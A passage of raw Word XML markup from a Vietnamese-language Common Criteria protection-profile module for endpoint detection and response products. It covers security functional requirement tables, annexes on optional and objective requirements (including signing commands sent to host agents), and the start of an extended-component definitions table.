          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="74B0EFF3" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34253BD0" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:lastRenderedPageBreak/>
              <w:t>FPT_ITT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13746E1C" w14:textId="7F34B3C7" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một bộ chức năng cụ thể để liên lạc an toàn khác biệt về mặt logic với Tác nhân máy chủ. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="18D8FCAA" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F23DEE" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FTP_TRP.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="623EA8A7" w14:textId="282B6870" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một bộ chức năng cụ thể để quản trị EDR từ xa an toàn. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="5EC65988" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5761D21C" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SFR tùy chọn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="2738BD18" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7A659CAE" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module này không xác định bất kỳ yêu cầu tùy chọn nào.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="0E43467E" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="46BAFB30" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SFR dựa trên lựa chọn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="3F7225CC" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="45F41262" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>PP-Module này không xác định bất kỳ yêu cầu dựa trên lựa chọn nào.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="1E7294D0" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1920E80A" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SFR mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="11EAF8B3" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CC3A67D" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_TRM_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D6C25A" w14:textId="0601CEEC" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định các biện pháp bảo vệ cho tính toàn vẹn của các lệnh được gửi đến Tác nhân máy chủ. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DF57A3A" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F03A7C4" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="4F7207B5" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:sectPr w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidSect="002C6707">
          <w:headerReference w:type="even" r:id="rId54"/>
          <w:headerReference w:type="default" r:id="rId55"/>
          <w:footerReference w:type="even" r:id="rId56"/>
          <w:footerReference w:type="default" r:id="rId57"/>
          <w:headerReference w:type="first" r:id="rId58"/>
          <w:footerReference w:type="first" r:id="rId59"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="633" w:footer="723" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB64D3A" w14:textId="77777777" w:rsidR="00D04F5D" w:rsidRPr="00204C5F" w:rsidRDefault="003444FE" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc137476362"/>
      <w:bookmarkStart w:id="34" w:name="_Toc502652917"/>
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t>Phụ lục A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997AB83" w14:textId="77777777" w:rsidR="00D04F5D" w:rsidRPr="00204C5F" w:rsidRDefault="00D04F5D" w:rsidP="00D04F5D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Quy định)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D13E5" w14:textId="0CFFED6D" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các SFR tùy chọn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="6CBA2A1A" w14:textId="695905BB" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>PP-Module này không xác định bất kỳ SFR tùy chọn nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259813DE" w14:textId="1F070E3E" w:rsidR="006A499A" w:rsidRPr="00204C5F" w:rsidRDefault="003444FE" w:rsidP="00BD2F41">
      <w:pPr>
        <w:sectPr w:rsidR="006A499A" w:rsidRPr="00204C5F" w:rsidSect="003D27B3">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="633" w:footer="723" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:br/>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="0A54FCA2" w14:textId="77777777" w:rsidR="00D04F5D" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc3797840"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="36" w:name="_Toc137476363"/>
      <w:r w:rsidR="006A499A" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phụ lục B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1160C2" w14:textId="77777777" w:rsidR="00D04F5D" w:rsidRPr="00204C5F" w:rsidRDefault="00D04F5D" w:rsidP="00D04F5D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Quy định)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="055EF69D" w14:textId="4842E443" w:rsidR="007003B3" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SFR cơ sở được lựa chọn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="575B9FE4" w14:textId="32DEB84B" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>PP-Module này không xác định bất kỳ SFR cơ sở nào được lựa chọn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858F681" w14:textId="77777777" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidSect="006D5C6B">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="633" w:footer="723" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C13893" w14:textId="77777777" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="006A499A" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc3797841"/>
      <w:bookmarkStart w:id="38" w:name="_Toc137476364"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phụ lục C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B78826" w14:textId="5C99F7BB" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="005873FB" w:rsidP="005873FB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Tham khảo)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:p w14:paraId="0694F8BC" w14:textId="414825E2" w:rsidR="006A499A" w:rsidRPr="00204C5F" w:rsidRDefault="007003B3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SFR mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="1D822855" w14:textId="14A66184" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Phần này được dành riêng cho các yêu cầu hiện không được PP-Module này quy định nhưng dự kiến sẽ được đưa vào các phiên bản tương lai của PP-Module. Các </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:t>đơn vị cung cấp</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> có kế hoạch thực hiện đánh giá đối với các sản phẩm trong tương lai được khuyến khích lập kế hoạch để đáp ứng các yêu cầu khách quan này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25520A0A" w14:textId="77777777" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_TRM_EXT.1 Chức năng khắc phục đáng tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5757EE35" w14:textId="77777777" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FMT_TRM_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A5985" w14:textId="30FCBF8A" w:rsidR="00A752BA" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00BD2F41" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>EDR, Nền tảng EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00EA77DD" w:rsidRPr="00204C5F">
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> ký điện tử các lệnh và chính sách được gửi đến Tác nhân máy chủ bằng chữ ký [</w:t>
      </w:r>
      <w:r w:rsidR="00BD2F41" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>: RSA, ECDSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>] đáp ứng FIPS PUB 186-4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288BA4D7" w14:textId="0741724C" w:rsidR="00D87411" w:rsidRPr="00204C5F" w:rsidRDefault="00A752BA" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> Mục đích của yêu cầu này là liên kết bằng mật mã bất kỳ cập nhật chính sách hoặc lệnh nào được gửi đến </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>Tác nhân máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> dưới dạng từ EDR. Điều này không phải để bảo vệ các chính sách trong quá trình vận chuyển vì chúng đã được bảo vệ bởi FPT_ITT.1. Nếu TSF thực hiện chức năng này, bất kỳ thuật toán chữ ký nào được sử dụng phải nhất quán với bất kỳ lựa chọn nào được thực hiện trong FCS_COP.1(3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C7564" w14:textId="77777777" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="006A499A" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="39" w:name="_Toc3797842"/>
      <w:bookmarkStart w:id="40" w:name="_Toc137476365"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phụ lục D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62477970" w14:textId="77777777" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="005873FB" w:rsidP="005873FB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Quy định)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:p w14:paraId="05A1B9DA" w14:textId="2BC1DF1D" w:rsidR="006A499A" w:rsidRPr="00204C5F" w:rsidRDefault="007003B3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Định nghĩa thành phần mở rộng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="69964A93" w14:textId="7C14AD0B" w:rsidR="00D87411" w:rsidRPr="00204C5F" w:rsidRDefault="00D87411" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phụ lục này bao gồm các định nghĩa đối với các yêu cầu mở rộng được sử dụng trong PP-Module, bao gồm các định nghĩa được sử dụng trong Phụ lục A đến C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A49C7" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1 Bối cảnh và Phạm vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D40F0" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phụ lục này cung cấp định nghĩa cho tất cả các thành phần mở rộng được giới thiệu trong PP-Module này. Các thành phần này được xác định trong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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="491D8FC6" w14:textId="77777777" w:rsidTr="000F0350">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D13BE2" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Lớp chức năng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F34152" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Thành phần chức năng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="238BD0FD" w14:textId="77777777" w:rsidTr="000F0350">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E21867C" w14:textId="1026A6B1" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">Kiểm toán </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> (FAU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37310E93" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>FAU_ALT_EXT Cảnh báo máy chủ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7008FAD6" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>FAU_COL_EXT Dữ liệu điểm cuối đã thu thập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="0F238D52" w14:textId="77777777" w:rsidTr="000F0350">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45DD4D75" w14:textId="1011A976" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>Định danh</w:t>
            </w:r>
            <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> và Xác thực (FIA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
